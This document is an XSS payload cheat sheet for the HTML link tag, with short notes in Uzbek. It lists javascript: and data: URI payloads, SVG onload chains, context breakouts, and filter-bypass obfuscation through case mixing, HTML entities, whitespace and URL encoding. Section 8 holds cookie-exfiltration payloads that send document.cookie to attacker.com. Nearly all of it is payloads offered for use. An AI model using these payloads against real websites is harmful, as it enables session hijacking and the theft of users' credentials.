🔥 ULTIMATE LINK TAG XSS (CLEAN)

⸻

1. JAVASCRIPT URI (⚠️ LIMITED)

<link rel="stylesheet" href="javascript:alert(1)">
<link href="javascript:alert(1)" rel="next">

👉 ko‘p browserlarda ishlamaydi (lekin filter bypass test uchun kerak)

⸻

2. DATA URI (MUHIM)

<link rel="stylesheet" href="data:text/html,<script>alert(1)</script>">
<link rel="stylesheet" href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">


⸻

3. SVG CHAIN

<link rel="stylesheet" href="data:image/svg+xml,<svg onload=alert(1)>">


⸻

4. REL ABUSE (NON-STYLESHEET)

<link rel="prefetch" href="javascript:alert(1)">
<link rel="preload" href="javascript:alert(1)">
<link rel="next" href="javascript:alert(1)">


⸻

5. CONTEXT BREAKOUT

"><link rel="stylesheet" href="javascript:alert(1)">
'><link rel="stylesheet" href="data:text/html,<script>alert(1)</script>">


⸻

6. OBFUSCATION

<link rel="stylesheet" href="jAvAsCrIpT:alert(1)">
<link rel="stylesheet" href="javascript&colon;alert(1)">
<link rel="stylesheet" href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)">


⸻

7. WHITESPACE BYPASS

<link rel="stylesheet" href="jav	ascript:alert(1)">
<link rel="stylesheet" href=" javascript:alert(1)">


⸻

8. DATA EXFILTRATION

<link rel="stylesheet" href="javascript:fetch('//attacker.com?c='+document.cookie)">
<link rel="stylesheet" href="javascript:location='//attacker.com?c='+document.cookie">


⸻

9. POLYGLOT

</title><link rel="stylesheet" href="javascript:alert(1)">


⸻

10. ENCODED

%3Clink%20rel%3Dstylesheet%20href%3Djavascript%3Aalert(1)%3E


⸻

11. ADVANCED JS

<link rel="stylesheet" href="javascript:eval('alert(1)')">
<link rel="stylesheet" href="javascript:setTimeout(alert,0,1)">


⸻

12. HYBRID (CHAIN)

<link rel="stylesheet" href="data:text/html,<svg onload=alert(1)>">
